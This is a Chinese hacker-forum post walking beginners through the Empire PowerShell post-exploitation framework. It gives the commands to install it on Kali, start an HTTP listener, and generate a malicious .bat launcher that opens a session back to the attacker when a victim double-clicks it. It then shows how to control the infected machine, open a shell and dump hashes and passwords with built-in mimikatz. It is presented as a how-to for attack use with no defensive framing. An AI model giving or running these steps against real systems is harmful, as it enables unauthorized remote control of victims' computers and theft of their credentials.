跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Empire框架指南(一)


HACK1949

推荐的帖子

Empire是针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透测试攻击框架,具有stager生成提权、权限维持的功能。Empire无需powershell.exe就能运行power shell代理的功能,有许多后期漏洞利用模块。类似于msf。

Empire

在kali中安装

在kali中安装很简单,我们只需执行下面命令即可。

sudo apt install powershell-empire

1726391229.png

启动服务端

这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动Empire powershell服务端

powershell-empire server

782013525.png

启动Empire powershell 客户端

powershell-empire client

3227777116.png

牛刀小试

Empire的使用方法与msf的方法相同,先设置监听,生成木马,然后监听反弹代理。
输入Listeners进入监听页面,uselistener设置监听模式,共有7种模式

  • dbx
  • http
  • http_foreign
  • http_hop
  • http_mapi
  • http_com
  • meterpreter

这里,我们以http模块为例:

uselistener http #监听方式为http
set Port 4321 #设置端口
execute #运行

2825878783.png
现在配置完监听模块,我们来看看怎样生成shell.

wx1.png

使用windows/launcher_bat模块,来生成恶意shell。

usestager windows/launcher_bat
set Listener http #设置监听方式
execute #运行

执行完成上面的命令后,我们的恶意文件已经生成。格式为bat
4041052440.png
3773782073.png
双击运行后,我们可以看到已经成功得到了会话。输入agents可以查看连接上的计算机的详细信息。
3629749924.png

连接设备

和msf一样,我们需要连接当前在线的设备。interact 设备name

interact V1T86EUN

1766095549.png
运行help命令,可以看到具体的帮助文档。
3753414467.png
由于命令比较多,这里我列举常用的一些命令
进入系统cmd

shell

1635092308.png

使用内置的mimikatz抓取hash和密码

mimikatz

设备详细信息

info

12.png

总结

empire模块和msf一样,功能很强大。配置相比msf略有不同。后期的文章中,我们还会重点更新!喜欢的小伙伴们欢迎点赞收藏!

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...